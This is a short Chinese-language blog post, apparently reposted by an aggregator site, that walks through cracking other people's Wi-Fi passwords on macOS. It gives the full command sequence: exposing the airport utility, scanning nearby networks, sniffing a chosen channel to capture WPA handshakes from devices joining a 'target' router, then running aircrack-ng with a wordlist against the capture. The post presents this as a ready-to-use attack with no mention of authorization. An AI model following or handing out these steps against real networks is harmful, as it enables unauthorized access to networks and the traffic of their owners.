MAC OS 下破解无线网络

2017-05-16 10:04:29来源:http://zhangyongcun.com/2017/05/15/MAC-OS-下破解无线网络/作者:Titzanyic人点击


airport 是 MAC 下的无线工具,我们需要使用这个工具,抓取握手包。握手包,简单的来说,就是我们利用无线网卡,抓取空中所有的通讯信号,握手包这个信号,出现在某个设备打开 wifi,准备和无线路由器连接的时候出现,这个握手包包含的用于验证 wifi 的密码信息。


通过这个命令你就可以使用 airport


sudo ln -s /System/Library/PrivateFrameworks/Apple80211.framework/Versions/Current/Resources/airport /usr/local/bin/airport

扫描 wifi 信息


airport -s

选择信道进行扫描,6 为信道(也可以使用其他信道,根据目标 wifi 信息即可),en0 为本机网卡地址(使用 ifconfig 查看)


sudo airport en0 sniff 6

适当时候 CMD + C 结束监听,得到数据包。日志会显示数据包位置和名称。(十分钟以上就可以,此时电脑要放置一个相对空旷的地方,时机最好为此时时间段会有比较频繁的手机连接到路由器的时候。)


cd /tmp
ls -lh *.cap

拷贝数据包进行破解工作,破解使用 aircrack-ng ,需要先使用 brew 进行安装。


破解 01.txt 为字典 01.cap 为握手包


0 handshake)是抓包失败,(1 handshake)则是抓包成功


brew install aircrack-ng
aircrack-ng -w 01.txt 01.cap

参数解释:


01.txt 为破解字典
01.cap 抓取到的数据包
-b: 指定要破解的 wifi BSSID

执行后,会提示选择目标 wifi,并显示数据包中握手包信息。显示选择有 1 handshake 的 wifi 说明抓取到握手包,否则需要重新再抓。


自己跑包特别耗时,请交给专业人士。


最新文章

123

最新摄影

闪念基因

微信扫一扫

第七城市微信公众平台